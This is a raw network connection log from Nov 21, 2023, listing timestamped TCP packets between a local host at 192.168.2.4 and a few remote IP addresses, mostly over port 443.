                                                                          Nov 21, 2023 17:58:41.426280022 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.426321030 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.427213907 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.427264929 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.427298069 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.427304983 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.427311897 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.427345991 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.427352905 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428041935 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428067923 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428086042 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.428097010 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428136110 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.428142071 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428860903 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428889990 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428900003 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.428906918 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428926945 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428949118 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.428956032 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.428992987 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.429763079 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429811954 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429836988 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429837942 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429857016 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429862022 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.429878950 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429899931 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.429913998 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429951906 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.429959059 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.429970026 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430007935 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.430675030 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430706024 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430715084 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430737972 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430746078 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.430753946 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430769920 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.430778980 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.430819035 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.430825949 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.431588888 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.431617022 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.431632042 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.431638956 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.431684017 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.431689978 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432434082 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432461023 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432471037 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.432477951 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432522058 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.432528019 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432538033 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.432574987 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.471518040 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.487401962 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.502732038 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.534006119 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.546947002 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.547034025 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.547831059 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.547878027 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.547939062 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.547972918 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.548008919 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.548016071 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.548039913 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.548049927 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.548054934 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.548063993 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.548096895 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.549521923 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.553992987 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.553998947 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.554224968 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.554234028 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.554421902 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.554653883 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.555613995 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.555685997 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.555820942 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.555970907 CET49754443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.555988073 CET44349754104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.557549953 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.557739019 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.558237076 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.558800936 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.560688019 CET49759443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.560700893 CET44349759104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.561099052 CET49757443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.561117887 CET44349757104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.561959982 CET49758443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.561969042 CET44349758104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.566459894 CET4973980192.168.2.445.156.26.175
                                                                          Nov 21, 2023 17:58:41.601263046 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.601265907 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.704181910 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:41.704202890 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:41.704253912 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:41.710524082 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:41.710545063 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:41.778776884 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.778832912 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:41.778903961 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.779104948 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.779145002 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:41.779190063 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.779493093 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.779499054 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:41.779756069 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:41.779763937 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:41.793891907 CET804973945.156.26.175192.168.2.4
                                                                          Nov 21, 2023 17:58:41.910567999 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.910603046 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.910655022 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.910665989 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.910676956 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.910743952 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.913813114 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.913923025 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.913981915 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.914017916 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.914181948 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:41.914227962 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:41.974209070 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:42.020895004 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:42.074727058 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.076208115 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.130145073 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.130146980 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.969094992 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.969111919 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.969224930 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.969265938 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.969347000 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:42.969371080 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:42.970320940 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.970364094 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:42.970364094 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.970407009 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.970444918 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:42.973108053 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.973172903 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.973196983 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.975094080 CET49761443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.975109100 CET44349761104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.976346970 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.976413965 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.976759911 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.976962090 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.977796078 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:42.977861881 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:42.977979898 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.977993011 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.978087902 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:42.978101015 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:42.978166103 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:42.978173018 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:42.978669882 CET49760443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.978709936 CET44349760104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.982121944 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.982147932 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.982204914 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.982717037 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.982738972 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.982892036 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.983318090 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.983333111 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.983382940 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.983688116 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.983705997 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.983936071 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.983946085 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.984112978 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.984122992 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.985711098 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.985733032 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.985780954 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.986258030 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.986272097 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.986323118 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.992697001 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.992706060 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:42.992858887 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:42.992870092 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.018305063 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.018306017 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.020828009 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.124730110 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.124763012 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.124789000 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.124805927 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.124815941 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.124830961 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.124849081 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.125097990 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.125118971 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.125144005 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.125149012 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.125185966 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.125524998 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.125566006 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.125611067 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.126467943 CET49763443192.168.2.4104.21.72.3
                                                                          Nov 21, 2023 17:58:43.126477003 CET44349763104.21.72.3192.168.2.4
                                                                          Nov 21, 2023 17:58:43.209820986 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.209873915 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.209920883 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.209932089 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.209975004 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.238863945 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.238929033 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.238982916 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.238985062 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239000082 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239037037 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.239044905 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239120007 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239159107 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239166975 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.239176989 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239217043 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.239551067 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239634991 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239672899 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239675999 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.239685059 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.239716053 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.240362883 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.240425110 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.240461111 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.240470886 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241221905 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241266012 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.241272926 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241317034 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241352081 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.241357088 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241367102 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241403103 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.241410971 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241487980 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.241534948 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.254844904 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.279258013 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.280297041 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.293194056 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.295269966 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.301651001 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.318747044 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.318757057 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.318824053 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321006060 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321014881 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.321176052 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321182013 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.321305990 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321316957 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.321393013 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321403980 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.321496010 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321510077 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.321608067 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.321616888 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.322490931 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.322834015 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.322856903 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.322904110 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.322912931 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.322917938 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.322964907 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.322994947 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.323086977 CET49766443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.323208094 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.323275089 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.323353052 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.323539972 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.323657036 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.323707104 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.323926926 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.323982000 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.324281931 CET49767443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.324343920 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.324348927 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.324404001 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.324409008 CET44349768104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.324790955 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.324872971 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.324891090 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.365263939 CET44349766104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.365391016 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.365402937 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.365411043 CET44349770104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.365511894 CET49768443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.369251966 CET44349767104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.401417971 CET49765443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.401431084 CET44349765172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.402879953 CET49764443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.402889013 CET44349764172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.408145905 CET49770443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.447614908 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.447633982 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.447704077 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.448970079 CET49773443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.448995113 CET44349773172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.449513912 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.449536085 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.449593067 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.449959993 CET49774443192.168.2.4172.67.139.60
                                                                          Nov 21, 2023 17:58:43.449973106 CET44349774172.67.139.60192.168.2.4
                                                                          Nov 21, 2023 17:58:43.577730894 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.577776909 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.577867031 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.577876091 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.577893019 CET44349769104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.577948093 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.584245920 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.584480047 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.584486961 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.585362911 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.585424900 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.587431908 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.587483883 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.587615013 CET49772443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.587620020 CET44349772104.21.62.203192.168.2.4
                                                                          Nov 21, 2023 17:58:43.609616995 CET49769443192.168.2.4104.21.62.203
                                                                          Nov 21, 2023 17:58:43.609630108 CET44349769104.21.62.203192.168.2.4
